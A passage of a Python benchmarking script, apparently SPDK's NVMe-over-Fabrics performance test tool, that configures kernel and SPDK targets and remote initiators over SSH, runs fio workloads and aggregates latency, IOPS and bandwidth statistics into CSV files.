else:
self.exec_cmd(["sudo", "tuned-adm", "profile", self.tuned_restore_dict["profile"]])
self.log_print("Reverted tuned-adm to %s profile." % self.tuned_restore_dict["profile"])
def restore_governor(self):
self.log_print("Restoring CPU governor setting...")
if self.governor_restore:
self.exec_cmd(["sudo", "cpupower", "frequency-set", "-g", self.governor_restore])
self.log_print("Reverted CPU governor to %s." % self.governor_restore)
class Target(Server):
def __init__(self, name, general_config, target_config):
super(Target, self).__init__(name, general_config, target_config)
# Defaults
self.enable_sar = False
self.sar_delay = 0
self.sar_interval = 0
self.sar_count = 0
self.enable_pcm = False
self.pcm_dir = ""
self.pcm_delay = 0
self.pcm_interval = 0
self.pcm_count = 0
self.enable_bandwidth = 0
self.bandwidth_count = 0
self.enable_dpdk_memory = False
self.dpdk_wait_time = 0
self.enable_zcopy = False
self.scheduler_name = "static"
self.null_block = 0
self._nics_json_obj = json.loads(self.exec_cmd(["ip", "-j", "address", "show"]))
self.subsystem_info_list = []
if "null_block_devices" in target_config:
self.null_block = target_config["null_block_devices"]
if "sar_settings" in target_config:
self.enable_sar, self.sar_delay, self.sar_interval, self.sar_count = target_config["sar_settings"]
if "pcm_settings" in target_config:
self.enable_pcm = True
self.pcm_dir, self.pcm_delay, self.pcm_interval, self.pcm_count = target_config["pcm_settings"]
if "enable_bandwidth" in target_config:
self.enable_bandwidth, self.bandwidth_count = target_config["enable_bandwidth"]
if "enable_dpdk_memory" in target_config:
self.enable_dpdk_memory, self.dpdk_wait_time = target_config["enable_dpdk_memory"]
if "scheduler_settings" in target_config:
self.scheduler_name = target_config["scheduler_settings"]
if "zcopy_settings" in target_config:
self.enable_zcopy = target_config["zcopy_settings"]
self.script_dir = os.path.dirname(os.path.abspath(sys.argv[0]))
self.spdk_dir = os.path.abspath(os.path.join(self.script_dir, "../../../"))
self.set_local_nic_info(self.set_local_nic_info_helper())
if "skip_spdk_install" not in general_config or general_config["skip_spdk_install"] is False:
self.zip_spdk_sources(self.spdk_dir, "/tmp/spdk.zip")
self.configure_system()
if self.enable_adq:
self.configure_adq()
self.sys_config()
def set_local_nic_info_helper(self):
return json.loads(self.exec_cmd(["lshw", "-json"]))
def exec_cmd(self, cmd, stderr_redirect=False, change_dir=None):
stderr_opt = None
if stderr_redirect:
stderr_opt = subprocess.STDOUT
if change_dir:
old_cwd = os.getcwd()
os.chdir(change_dir)
self.log_print("Changing directory to %s" % change_dir)
out = check_output(cmd, stderr=stderr_opt).decode(encoding="utf-8")
if change_dir:
os.chdir(old_cwd)
self.log_print("Changing directory to %s" % old_cwd)
return out
def zip_spdk_sources(self, spdk_dir, dest_file):
self.log_print("Zipping SPDK source directory")
fh = zipfile.ZipFile(dest_file, "w", zipfile.ZIP_DEFLATED)
for root, directories, files in os.walk(spdk_dir, followlinks=True):
for file in files:
fh.write(os.path.relpath(os.path.join(root, file)))
fh.close()
self.log_print("Done zipping")
def read_json_stats(self, file):
with open(file, "r") as json_data:
data = json.load(json_data)
job_pos = 0 # job_post = 0 because using aggregated results
# Check if latency is in nano or microseconds to choose correct dict key
def get_lat_unit(key_prefix, dict_section):
# key prefix - lat, clat or slat.
# dict section - portion of json containing latency bucket in question
# Return dict key to access the bucket and unit as string
for k, v in dict_section.items():
if k.startswith(key_prefix):
return k, k.split("_")[1]
def get_clat_percentiles(clat_dict_leaf):
if "percentile" in clat_dict_leaf:
p99_lat = float(clat_dict_leaf["percentile"]["99.000000"])
p99_9_lat = float(clat_dict_leaf["percentile"]["99.900000"])
p99_99_lat = float(clat_dict_leaf["percentile"]["99.990000"])
p99_999_lat = float(clat_dict_leaf["percentile"]["99.999000"])
return [p99_lat, p99_9_lat, p99_99_lat, p99_999_lat]
else:
# Latest fio versions do not provide "percentile" results if no
# measurements were done, so just return zeroes
return [0, 0, 0, 0]
read_iops = float(data["jobs"][job_pos]["read"]["iops"])
read_bw = float(data["jobs"][job_pos]["read"]["bw"])
lat_key, lat_unit = get_lat_unit("lat", data["jobs"][job_pos]["read"])
read_avg_lat = float(data["jobs"][job_pos]["read"][lat_key]["mean"])
read_min_lat = float(data["jobs"][job_pos]["read"][lat_key]["min"])
read_max_lat = float(data["jobs"][job_pos]["read"][lat_key]["max"])
clat_key, clat_unit = get_lat_unit("clat", data["jobs"][job_pos]["read"])
read_p99_lat, read_p99_9_lat, read_p99_99_lat, read_p99_999_lat = get_clat_percentiles(
data["jobs"][job_pos]["read"][clat_key])
if "ns" in lat_unit:
read_avg_lat, read_min_lat, read_max_lat = [x / 1000 for x in [read_avg_lat, read_min_lat, read_max_lat]]
if "ns" in clat_unit:
read_p99_lat = read_p99_lat / 1000
read_p99_9_lat = read_p99_9_lat / 1000
read_p99_99_lat = read_p99_99_lat / 1000
read_p99_999_lat = read_p99_999_lat / 1000
write_iops = float(data["jobs"][job_pos]["write"]["iops"])
write_bw = float(data["jobs"][job_pos]["write"]["bw"])
lat_key, lat_unit = get_lat_unit("lat", data["jobs"][job_pos]["write"])
write_avg_lat = float(data["jobs"][job_pos]["write"][lat_key]["mean"])
write_min_lat = float(data["jobs"][job_pos]["write"][lat_key]["min"])
write_max_lat = float(data["jobs"][job_pos]["write"][lat_key]["max"])
clat_key, clat_unit = get_lat_unit("clat", data["jobs"][job_pos]["write"])
write_p99_lat, write_p99_9_lat, write_p99_99_lat, write_p99_999_lat = get_clat_percentiles(
data["jobs"][job_pos]["write"][clat_key])
if "ns" in lat_unit:
write_avg_lat, write_min_lat, write_max_lat = [x / 1000 for x in [write_avg_lat, write_min_lat, write_max_lat]]
if "ns" in clat_unit:
write_p99_lat = write_p99_lat / 1000
write_p99_9_lat = write_p99_9_lat / 1000
write_p99_99_lat = write_p99_99_lat / 1000
write_p99_999_lat = write_p99_999_lat / 1000
return [read_iops, read_bw, read_avg_lat, read_min_lat, read_max_lat,
read_p99_lat, read_p99_9_lat, read_p99_99_lat, read_p99_999_lat,
write_iops, write_bw, write_avg_lat, write_min_lat, write_max_lat,
write_p99_lat, write_p99_9_lat, write_p99_99_lat, write_p99_999_lat]
def parse_results(self, results_dir, initiator_count=None, run_num=None):
files = os.listdir(results_dir)
fio_files = filter(lambda x: ".fio" in x, files)
json_files = [x for x in files if ".json" in x]
headers = ["read_iops", "read_bw", "read_avg_lat_us", "read_min_lat_us", "read_max_lat_us",
"read_p99_lat_us", "read_p99.9_lat_us", "read_p99.99_lat_us", "read_p99.999_lat_us",
"write_iops", "write_bw", "write_avg_lat_us", "write_min_lat_us", "write_max_lat_us",
"write_p99_lat_us", "write_p99.9_lat_us", "write_p99.99_lat_us", "write_p99.999_lat_us"]
aggr_headers = ["iops", "bw", "avg_lat_us", "min_lat_us", "max_lat_us",
"p99_lat_us", "p99.9_lat_us", "p99.99_lat_us", "p99.999_lat_us"]
header_line = ",".join(["Name", *headers])
aggr_header_line = ",".join(["Name", *aggr_headers])
# Create empty results file
csv_file = "nvmf_results.csv"
with open(os.path.join(results_dir, csv_file), "w") as fh:
fh.write(aggr_header_line + "\n")
rows = set()
for fio_config in fio_files:
self.log_print("Getting FIO stats for %s" % fio_config)
job_name, _ = os.path.splitext(fio_config)
# Look in the filename for rwmixread value. Function arguments do
# not have that information.
# TODO: Improve this function by directly using workload params instead
# of regexing through filenames.
if "read" in job_name:
rw_mixread = 1
elif "write" in job_name:
rw_mixread = 0
else:
rw_mixread = float(re.search(r"m_(\d+)", job_name).group(1)) / 100
# If "_CPU" exists in name - ignore it
# Initiators for the same job could have diffrent num_cores parameter
job_name = re.sub(r"_\d+CPU", "", job_name)
job_result_files = [x for x in json_files if job_name in x]
self.log_print("Matching result files for current fio config:")
for j in job_result_files:
self.log_print("\t %s" % j)
# There may have been more than 1 initiator used in test, need to check that
# Result files are created so that string after last "_" separator is server name
inits_names = set([os.path.splitext(x)[0].split("_")[-1] for x in job_result_files])
inits_avg_results = []
for i in inits_names:
self.log_print("\tGetting stats for initiator %s" % i)
# There may have been more than 1 test run for this job, calculate average results for initiator
i_results = [x for x in job_result_files if i in x]
i_results_filename = re.sub(r"run_\d+_", "", i_results[0].replace("json", "csv"))
separate_stats = []
for r in i_results:
stats = self.read_json_stats(os.path.join(results_dir, r))
separate_stats.append(stats)
self.log_print(stats)
init_results = [sum(x) for x in zip(*separate_stats)]
init_results = [x / len(separate_stats) for x in init_results]
inits_avg_results.append(init_results)
self.log_print("\tAverage results for initiator %s" % i)
self.log_print(init_results)
with open(os.path.join(results_dir, i_results_filename), "w") as fh:
fh.write(header_line + "\n")
fh.write(",".join([job_name, *["{0:.3f}".format(x) for x in init_results]]) + "\n")
# Sum results of all initiators running this FIO job.
# Latency results are an average of latencies from accros all initiators.
inits_avg_results = [sum(x) for x in zip(*inits_avg_results)]
inits_avg_results = OrderedDict(zip(headers, inits_avg_results))
for key in inits_avg_results:
if "lat" in key:
inits_avg_results[key] /= len(inits_names)
# Aggregate separate read/write values into common labels
# Take rw_mixread into consideration for mixed read/write workloads.
aggregate_results = OrderedDict()
for h in aggr_headers:
read_stat, write_stat = [float(value) for key, value in inits_avg_results.items() if h in key]
if "lat" in h:
_ = rw_mixread * read_stat + (1 - rw_mixread) * write_stat
else:
_ = read_stat + write_stat
aggregate_results[h] = "{0:.3f}".format(_)
rows.add(",".join([job_name, *aggregate_results.values()]))
# Save results to file
for row in rows:
with open(os.path.join(results_dir, csv_file), "a") as fh:
fh.write(row + "\n")
self.log_print("You can find the test results in the file %s" % os.path.join(results_dir, csv_file))
def measure_sar(self, results_dir, sar_file_name):
self.log_print("Waiting %d delay before measuring SAR stats" % self.sar_delay)
time.sleep(self.sar_delay)
out = self.exec_cmd(["sar", "-P", "ALL", "%s" % self.sar_interval, "%s" % self.sar_count])
with open(os.path.join(results_dir, sar_file_name), "w") as fh:
for line in out.split("\n"):
if "Average" in line and "CPU" in line:
self.log_print("Summary CPU utilization from SAR:")
self.log_print(line)
if "Average" in line and "all" in line:
self.log_print(line)
fh.write(out)
def measure_pcm_memory(self, results_dir, pcm_file_name):
time.sleep(self.pcm_delay)
cmd = ["%s/pcm-memory.x" % self.pcm_dir, "%s" % self.pcm_interval, "-csv=%s/%s" % (results_dir, pcm_file_name)]
pcm_memory = subprocess.Popen(cmd)
time.sleep(self.pcm_count)
pcm_memory.terminate()
def measure_pcm(self, results_dir, pcm_file_name):
time.sleep(self.pcm_delay)
cmd = ["%s/pcm.x" % self.pcm_dir, "%s" % self.pcm_interval, "-i=%s" % self.pcm_count, "-csv=%s/%s" % (results_dir, pcm_file_name)]
subprocess.run(cmd)
df = pd.read_csv(os.path.join(results_dir, pcm_file_name), header=[0, 1])
df = df.rename(columns=lambda x: re.sub(r'Unnamed:[\w\s]*$', '', x))
skt = df.loc[:, df.columns.get_level_values(1).isin({'UPI0', 'UPI1', 'UPI2'})]
skt_pcm_file_name = "_".join(["skt", pcm_file_name])
skt.to_csv(os.path.join(results_dir, skt_pcm_file_name), index=False)
def measure_pcm_power(self, results_dir, pcm_power_file_name):
time.sleep(self.pcm_delay)
out = self.exec_cmd(["%s/pcm-power.x" % self.pcm_dir, "%s" % self.pcm_interval, "-i=%s" % self.pcm_count])
with open(os.path.join(results_dir, pcm_power_file_name), "w") as fh:
fh.write(out)
def measure_network_bandwidth(self, results_dir, bandwidth_file_name):
self.log_print("INFO: starting network bandwidth measure")
self.exec_cmd(["bwm-ng", "-o", "csv", "-F", "%s/%s" % (results_dir, bandwidth_file_name),
"-a", "1", "-t", "1000", "-c", str(self.bandwidth_count)])
def measure_dpdk_memory(self, results_dir):
self.log_print("INFO: waiting to generate DPDK memory usage")
time.sleep(self.dpdk_wait_time)
self.log_print("INFO: generating DPDK memory usage")
rpc.env.env_dpdk_get_mem_stats
os.rename("/tmp/spdk_mem_dump.txt", "%s/spdk_mem_dump.txt" % (results_dir))
def sys_config(self):
self.log_print("====Kernel release:====")
self.log_print(os.uname().release)
self.log_print("====Kernel command line:====")
with open('/proc/cmdline') as f:
cmdline = f.readlines()
self.log_print('\n'.join(self.get_uncommented_lines(cmdline)))
self.log_print("====sysctl conf:====")
with open('/etc/sysctl.conf') as f:
sysctl = f.readlines()
self.log_print('\n'.join(self.get_uncommented_lines(sysctl)))
self.log_print("====Cpu power info:====")
self.log_print(self.exec_cmd(["cpupower", "frequency-info"]))
self.log_print("====zcopy settings:====")
self.log_print("zcopy enabled: %s" % (self.enable_zcopy))
self.log_print("====Scheduler settings:====")
self.log_print("SPDK scheduler: %s" % (self.scheduler_name))
class Initiator(Server):
def __init__(self, name, general_config, initiator_config):
super(Initiator, self).__init__(name, general_config, initiator_config)
# Required fields
self.ip = initiator_config["ip"]
self.target_nic_ips = initiator_config["target_nic_ips"]
# Defaults
self.cpus_allowed = None
self.cpus_allowed_policy = "shared"
self.spdk_dir = "/tmp/spdk"
self.fio_bin = "/usr/src/fio/fio"
self.nvmecli_bin = "nvme"
self.cpu_frequency = None
self.subsystem_info_list = []
if "spdk_dir" in initiator_config:
self.spdk_dir = initiator_config["spdk_dir"]
if "fio_bin" in initiator_config:
self.fio_bin = initiator_config["fio_bin"]
if "nvmecli_bin" in initiator_config:
self.nvmecli_bin = initiator_config["nvmecli_bin"]
if "cpus_allowed" in initiator_config:
self.cpus_allowed = initiator_config["cpus_allowed"]
if "cpus_allowed_policy" in initiator_config:
self.cpus_allowed_policy = initiator_config["cpus_allowed_policy"]
if "cpu_frequency" in initiator_config:
self.cpu_frequency = initiator_config["cpu_frequency"]
if os.getenv('SPDK_WORKSPACE'):
self.spdk_dir = os.getenv('SPDK_WORKSPACE')
self.ssh_connection = paramiko.SSHClient()
self.ssh_connection.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.ssh_connection.connect(self.ip, username=self.username, password=self.password)
self.exec_cmd(["sudo", "rm", "-rf", "%s/nvmf_perf" % self.spdk_dir])
self.exec_cmd(["mkdir", "-p", "%s" % self.spdk_dir])
self._nics_json_obj = json.loads(self.exec_cmd(["ip", "-j", "address", "show"]))
if "skip_spdk_install" not in general_config or general_config["skip_spdk_install"] is False:
self.copy_spdk("/tmp/spdk.zip")
self.set_local_nic_info(self.set_local_nic_info_helper())
self.set_cpu_frequency()
self.configure_system()
if self.enable_adq:
self.configure_adq()
self.sys_config()
def set_local_nic_info_helper(self):
return json.loads(self.exec_cmd(["lshw", "-json"]))
def __del__(self):
self.ssh_connection.close()
def exec_cmd(self, cmd, stderr_redirect=False, change_dir=None):
if change_dir:
cmd = ["cd", change_dir, ";", *cmd]
# In case one of the command elements contains whitespace and is not
# already quoted, # (e.g. when calling sysctl) quote it again to prevent expansion
# when sending to remote system.
for i, c in enumerate(cmd):
if (" " in c or "\t" in c) and not (c.startswith("'") and c.endswith("'")):
cmd[i] = '"%s"' % c
cmd = " ".join(cmd)
# Redirect stderr to stdout thanks using get_pty option if needed
_, stdout, _ = self.ssh_connection.exec_command(cmd, get_pty=stderr_redirect)
out = stdout.read().decode(encoding="utf-8")
# Check the return code
rc = stdout.channel.recv_exit_status()
if rc:
raise CalledProcessError(int(rc), cmd, out)
return out
def put_file(self, local, remote_dest):
ftp = self.ssh_connection.open_sftp()
ftp.put(local, remote_dest)
ftp.close()
def get_file(self, remote, local_dest):
ftp = self.ssh_connection.open_sftp()
ftp.get(remote, local_dest)
ftp.close()
def copy_spdk(self, local_spdk_zip):
self.log_print("Copying SPDK sources to initiator %s" % self.name)
self.put_file(local_spdk_zip, "/tmp/spdk_drop.zip")
self.log_print("Copied sources zip from target")
self.exec_cmd(["unzip", "-qo", "/tmp/spdk_drop.zip", "-d", self.spdk_dir])
self.log_print("Sources unpacked")
def copy_result_files(self, dest_dir):
self.log_print("Copying results")
if not os.path.exists(dest_dir):
os.mkdir(dest_dir)
# Get list of result files from initiator and copy them back to target
file_list = self.exec_cmd(["ls", "%s/nvmf_perf" % self.spdk_dir]).strip().split("\n")
for file in file_list:
self.get_file(os.path.join(self.spdk_dir, "nvmf_perf", file),
os.path.join(dest_dir, file))
self.log_print("Done copying results")
def discover_subsystems(self, address_list, subsys_no):
num_nvmes = range(0, subsys_no)
nvme_discover_output = ""
for ip, subsys_no in itertools.product(address_list, num_nvmes):
self.log_print("Trying to discover: %s:%s" % (ip, 4420 + subsys_no))
nvme_discover_cmd = ["sudo",
"%s" % self.nvmecli_bin,
"discover", "-t", "%s" % self.transport,
"-s", "%s" % (4420 + subsys_no),
"-a", "%s" % ip]
try:
stdout = self.exec_cmd(nvme_discover_cmd)
if stdout:
nvme_discover_output = nvme_discover_output + stdout
except CalledProcessError:
# Do nothing. In case of discovering remote subsystems of kernel target
# we expect "nvme discover" to fail a bunch of times because we basically
# scan ports.
pass
subsystems = re.findall(r'trsvcid:\s(\d+)\s+' # get svcid number
r'subnqn:\s+([a-zA-Z0-9\.\-\:]+)\s+' # get NQN id
r'traddr:\s+(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})', # get IP address
nvme_discover_output) # from nvme discovery output
subsystems = filter(lambda x: x[-1] in address_list, subsystems)
subsystems = list(set(subsystems))
subsystems.sort(key=lambda x: x[1])
self.log_print("Found matching subsystems on target side:")
for s in subsystems:
self.log_print(s)
self.subsystem_info_list = subsystems
def gen_fio_filename_conf(self, *args, **kwargs):
# Logic implemented in SPDKInitiator and KernelInitiator classes
pass
def gen_fio_config(self, rw, rwmixread, block_size, io_depth, subsys_no, num_jobs=None, ramp_time=0, run_time=10):
fio_conf_template = """
[global]
ioengine={ioengine}
{spdk_conf}
thread=1
group_reporting=1
direct=1
percentile_list=50:90:99:99.5:99.9:99.99:99.999
norandommap=1
rw={rw}
rwmixread={rwmixread}
bs={block_size}
time_based=1
ramp_time={ramp_time}
runtime={run_time}
"""
if "spdk" in self.mode:
bdev_conf = self.gen_spdk_bdev_conf(self.subsystem_info_list)
self.exec_cmd(["echo", "'%s'" % bdev_conf, ">", "%s/bdev.conf" % self.spdk_dir])
ioengine = "%s/build/fio/spdk_bdev" % self.spdk_dir
spdk_conf = "spdk_json_conf=%s/bdev.conf" % self.spdk_dir
else:
ioengine = "libaio"
spdk_conf = ""
out = self.exec_cmd(["sudo", "nvme", "list", "|", "grep", "-E", "'SPDK|Linux'",
"|", "awk", "'{print $1}'"])
subsystems = [x for x in out.split("\n") if "nvme" in x]
if self.cpus_allowed is not None:
self.log_print("Limiting FIO workload execution on specific cores %s" % self.cpus_allowed)
cpus_num = 0
cpus = self.cpus_allowed.split(",")
for cpu in cpus:
if "-" in cpu:
a, b = cpu.split("-")
a = int(a)
b = int(b)
cpus_num += len(range(a, b))
else:
cpus_num += 1
self.num_cores = cpus_num
threads = range(0, self.num_cores)
elif hasattr(self, 'num_cores'):
self.log_print("Limiting FIO workload execution to %s cores" % self.num_cores)
threads = range(0, int(self.num_cores))
else:
self.num_cores = len(subsystems)
threads = range(0, len(subsystems))
if "spdk" in self.mode:
filename_section = self.gen_fio_filename_conf(self.subsystem_info_list, threads, io_depth, num_jobs)
else:
filename_section = self.gen_fio_filename_conf(threads, io_depth, num_jobs)
fio_config = fio_conf_template.format(ioengine=ioengine, spdk_conf=spdk_conf,
rw=rw, rwmixread=rwmixread, block_size=block_size,
ramp_time=ramp_time, run_time=run_time)
if num_jobs:
fio_config = fio_config + "numjobs=%s \n" % num_jobs
if self.cpus_allowed is not None:
fio_config = fio_config + "cpus_allowed=%s \n" % self.cpus_allowed
fio_config = fio_config + "cpus_allowed_policy=%s \n" % self.cpus_allowed_policy
fio_config = fio_config + filename_section
fio_config_filename = "%s_%s_%s_m_%s" % (block_size, io_depth, rw, rwmixread)
if hasattr(self, "num_cores"):
fio_config_filename += "_%sCPU" % self.num_cores
fio_config_filename += ".fio"
self.exec_cmd(["mkdir", "-p", "%s/nvmf_perf" % self.spdk_dir])
self.exec_cmd(["echo", "'%s'" % fio_config, ">", "%s/nvmf_perf/%s" % (self.spdk_dir, fio_config_filename)])
self.log_print("Created FIO Config:")
self.log_print(fio_config)
return os.path.join(self.spdk_dir, "nvmf_perf", fio_config_filename)
def set_cpu_frequency(self):
if self.cpu_frequency is not None:
try:
self.exec_cmd(["sudo", "cpupower", "frequency-set", "-g", "userspace"], True)
self.exec_cmd(["sudo", "cpupower", "frequency-set", "-f", "%s" % self.cpu_frequency], True)
self.log_print(self.exec_cmd(["sudo", "cpupower", "frequency-info"]))
except Exception:
self.log_print("ERROR: cpu_frequency will not work when intel_pstate is enabled!")
sys.exit()
else:
self.log_print("WARNING: you have disabled intel_pstate and using default cpu governance.")
def run_fio(self, fio_config_file, run_num=None):
job_name, _ = os.path.splitext(fio_config_file)
self.log_print("Starting FIO run for job: %s" % job_name)
self.log_print("Using FIO: %s" % self.fio_bin)
if run_num:
for i in range(1, run_num + 1):
output_filename = job_name + "_run_" + str(i) + "_" + self.name + ".json"
output = self.exec_cmd(["sudo", self.fio_bin,
fio_config_file, "--output-format=json",
"--output=%s" % output_filename], True)
self.log_print(output)
else:
output_filename = job_name + "_" + self.name + ".json"
output = self.exec_cmd(["sudo", self.fio_bin,
fio_config_file, "--output-format=json",
"--output" % output_filename], True)
self.log_print(output)
self.log_print("FIO run finished. Results in: %s" % output_filename)
def sys_config(self):
self.log_print("====Kernel release:====")
self.log_print(self.exec_cmd(["uname", "-r"]))
self.log_print("====Kernel command line:====")
cmdline = self.exec_cmd(["cat", "/proc/cmdline"])
self.log_print('\n'.join(self.get_uncommented_lines(cmdline.splitlines())))
self.log_print("====sysctl conf:====")
sysctl = self.exec_cmd(["cat", "/etc/sysctl.conf"])
self.log_print('\n'.join(self.get_uncommented_lines(sysctl.splitlines())))
self.log_print("====Cpu power info:====")
self.log_print(self.exec_cmd(["cpupower", "frequency-info"]))
class KernelTarget(Target):
def __init__(self, name, general_config, target_config):
super(KernelTarget, self).__init__(name, general_config, target_config)
# Defaults
self.nvmet_bin = "nvmetcli"
if "nvmet_bin" in target_config:
self.nvmet_bin = target_config["nvmet_bin"]
def __del__(self):
nvmet_command(self.nvmet_bin, "clear")
def kernel_tgt_gen_subsystem_conf(self, nvme_list, address_list):
nvmet_cfg = {
"ports": [],
"hosts": [],
"subsystems": [],
}
# Split disks between NIC IP's
disks_per_ip = int(len(nvme_list) / len(address_list))
disk_chunks = [nvme_list[i * disks_per_ip:disks_per_ip + disks_per_ip * i] for i in range(0, len(address_list))]
subsys_no = 1
port_no = 0
for ip, chunk in zip(address_list, disk_chunks):
for disk in chunk:
nqn = "nqn.2018-09.io.spdk:cnode%s" % subsys_no
nvmet_cfg["subsystems"].append({
"allowed_hosts": [],
"attr": {
"allow_any_host": "1",
"serial": "SPDK00%s" % subsys_no,
"version": "1.3"
},
"namespaces": [
{
"device": {
"path": disk,
"uuid": "%s" % uuid.uuid4()
},
"enable": 1,
"nsid": subsys_no
}
],
"nqn": nqn
})
nvmet_cfg["ports"].append({
"addr": {
"adrfam": "ipv4",
"traddr": ip,
"trsvcid": "%s" % (4420 + port_no),
"trtype": "%s" % self.transport
},
"portid": subsys_no,
"referrals": [],
"subsystems": [nqn]
})
subsys_no += 1
port_no += 1
self.subsystem_info_list.append([port_no, nqn, ip])
with open("kernel.conf", "w") as fh:
fh.write(json.dumps(nvmet_cfg, indent=2))
pass
def tgt_start(self):
self.log_print("Configuring kernel NVMeOF Target")
if self.null_block:
print("Configuring with null block device.")
null_blk_list = ["/dev/nullb{}".format(x) for x in range(self.null_block)]
self.kernel_tgt_gen_subsystem_conf(null_blk_list, self.nic_ips)
self.subsys_no = len(null_blk_list)
else:
print("Configuring with NVMe drives.")
nvme_list = get_nvme_devices()
self.kernel_tgt_gen_subsystem_conf(nvme_list, self.nic_ips)
self.subsys_no = len(nvme_list)
nvmet_command(self.nvmet_bin, "clear")
nvmet_command(self.nvmet_bin, "restore kernel.conf")
if self.enable_adq:
self.adq_configure_tc()
self.log_print("Done configuring kernel NVMeOF Target")
class SPDKTarget(Target):
def __init__(self, name, general_config, target_config):
super(SPDKTarget, self).__init__(name, general_config, target_config)
# Required fields
self.core_mask = target_config["core_mask"]
self.num_cores = self.get_num_cores(self.core_mask)
# Defaults
self.dif_insert_strip = False
self.null_block_dif_type = 0
self.num_shared_buffers = 4096
if "num_shared_buffers" in target_config:
self.num_shared_buffers = target_config["num_shared_buffers"]
if "null_block_dif_type" in target_config:
self.null_block_dif_type = target_config["null_block_dif_type"]
if "dif_insert_strip" in target_config:
self.dif_insert_strip = target_config["dif_insert_strip"]
def get_num_cores(self, core_mask):
if "0x" in core_mask:
return bin(int(core_mask, 16)).count("1")
else:
num_cores = 0
core_mask = core_mask.replace("[", "")
core_mask = core_mask.replace("]", "")
for i in core_mask.split(","):
if "-" in i:
x, y = i.split("-")
num_cores += len(range(int(x), int(y))) + 1
else:
num_cores += 1
return num_cores
def spdk_tgt_configure(self):
self.log_print("Configuring SPDK NVMeOF target via RPC")
numa_list = get_used_numa_nodes()
# Create RDMA transport layer
rpc.nvmf.nvmf_create_transport(self.client, trtype=self.transport,
num_shared_buffers=self.num_shared_buffers,
dif_insert_or_strip=self.dif_insert_strip,
sock_priority=self.adq_priority)
self.log_print("SPDK NVMeOF transport layer:")
rpc.client.print_dict(rpc.nvmf.nvmf_get_transports(self.client))
if self.null_block:
self.spdk_tgt_add_nullblock(self.null_block)
self.spdk_tgt_add_subsystem_conf(self.nic_ips, self.null_block)
else:
self.spdk_tgt_add_nvme_conf()
self.spdk_tgt_add_subsystem_conf(self.nic_ips)
if self.enable_adq:
self.adq_configure_tc()
self.log_print("Done configuring SPDK NVMeOF Target")
def spdk_tgt_add_nullblock(self, null_block_count):
md_size = 0
block_size = 4096
if self.null_block_dif_type != 0:
md_size = 128
self.log_print("Adding null block bdevices to config via RPC")
for i in range(null_block_count):
self.log_print("Setting bdev protection to :%s" % self.null_block_dif_type)
rpc.bdev.bdev_null_create(self.client, 102400, block_size + md_size, "Nvme{}n1".format(i),
dif_type=self.null_block_dif_type, md_size=md_size)
self.log_print("SPDK Bdevs configuration:")
rpc.client.print_dict(rpc.bdev.bdev_get_bdevs(self.client))
def spdk_tgt_add_nvme_conf(self, req_num_disks=None):
self.log_print("Adding NVMe bdevs to config via RPC")
bdfs = get_nvme_devices_bdf()
bdfs = [b.replace(":", ".") for b in bdfs]
if req_num_disks:
if req_num_disks > len(bdfs):
self.log_print("ERROR: Requested number of disks is more than available %s" % len(bdfs))
sys.exit(1)
else:
bdfs = bdfs[0:req_num_disks]
for i, bdf in enumerate(bdfs):
rpc.bdev.bdev_nvme_attach_controller(self.client, name="Nvme%s" % i, trtype="PCIe", traddr=bdf)
self.log_print("SPDK Bdevs configuration:")
rpc.client.print_dict(rpc.bdev.bdev_get_bdevs(self.client))
def spdk_tgt_add_subsystem_conf(self, ips=None, req_num_disks=None):
self.log_print("Adding subsystems to config")
port = "4420"
if not req_num_disks:
req_num_disks = get_nvme_devices_count()
# Distribute bdevs between provided NICs
num_disks = range(0, req_num_disks)
if len(num_disks) == 1:
disks_per_ip = 1
else:
disks_per_ip = int(len(num_disks) / len(ips))
disk_chunks = [num_disks[i * disks_per_ip:disks_per_ip + disks_per_ip * i] for i in range(0, len(ips))]
# Create subsystems, add bdevs to namespaces, add listeners
for ip, chunk in zip(ips, disk_chunks):
for c in chunk:
nqn = "nqn.2018-09.io.spdk:cnode%s" % c
serial = "SPDK00%s" % c
bdev_name = "Nvme%sn1" % c
rpc.nvmf.nvmf_create_subsystem(self.client, nqn, serial,
allow_any_host=True, max_namespaces=8)
rpc.nvmf.nvmf_subsystem_add_ns(self.client, nqn, bdev_name)
rpc.nvmf.nvmf_subsystem_add_listener(self.client, nqn,
trtype=self.transport,
traddr=ip,
trsvcid=port,
adrfam="ipv4")
self.subsystem_info_list.append([port, nqn, ip])
self.log_print("SPDK NVMeOF subsystem configuration:")
rpc.client.print_dict(rpc.nvmf.nvmf_get_subsystems(self.client))
def tgt_start(self):
if self.null_block:
self.subsys_no = 1
else:
self.subsys_no = get_nvme_devices_count()
self.log_print("Starting SPDK NVMeOF Target process")
nvmf_app_path = os.path.join(self.spdk_dir, "build/bin/nvmf_tgt")
proc = subprocess.Popen([nvmf_app_path, "--wait-for-rpc", "-m", self.core_mask])
self.pid = os.path.join(self.spdk_dir, "nvmf.pid")
with open(self.pid, "w") as fh:
fh.write(str(proc.pid))
self.nvmf_proc = proc
self.log_print("SPDK NVMeOF Target PID=%s" % self.pid)
self.log_print("Waiting for spdk to initilize...")
while True:
if os.path.exists("/var/tmp/spdk.sock"):
break
time.sleep(1)
self.client = rpc.client.JSONRPCClient("/var/tmp/spdk.sock")
if self.enable_zcopy:
rpc.sock.sock_impl_set_options(self.client, impl_name="posix",
enable_zerocopy_send=True)
self.log_print("Target socket options:")
rpc.client.print_dict(rpc.sock.sock_impl_get_options(self.client, impl_name="posix"))
if self.enable_adq:
rpc.sock.sock_impl_set_options(self.client, impl_name="posix", enable_placement_id=1)
rpc.bdev.bdev_nvme_set_options(self.client, timeout_us=0, action_on_timeout=None,
nvme_adminq_poll_period_us=100000, retry_count=4)
rpc.nvmf.nvmf_set_config(self.client, acceptor_poll_rate=10000)
rpc.app.framework_set_scheduler(self.client, name=self.scheduler_name)
rpc.framework_start_init(self.client)
self.spdk_tgt_configure()
def __del__(self):
if hasattr(self, "nvmf_proc"):
try:
self.nvmf_proc.terminate()
self.nvmf_proc.wait()
except Exception as e:
self.log_print(e)
self.nvmf_proc.kill()
self.nvmf_proc.communicate()
class KernelInitiator(Initiator):
def __init__(self, name, general_config, initiator_config):
super(KernelInitiator, self).__init__(name, general_config, initiator_config)
# Defaults
self.extra_params = ""
if "extra_params" in initiator_config:
self.extra_params = initiator_config["extra_params"]
def __del__(self):
self.ssh_connection.close()
def kernel_init_connect(self, address_list, subsys_no):
self.log_print("Below connection attempts may result in error messages, this is expected!")
for subsystem in self.subsystem_info_list:
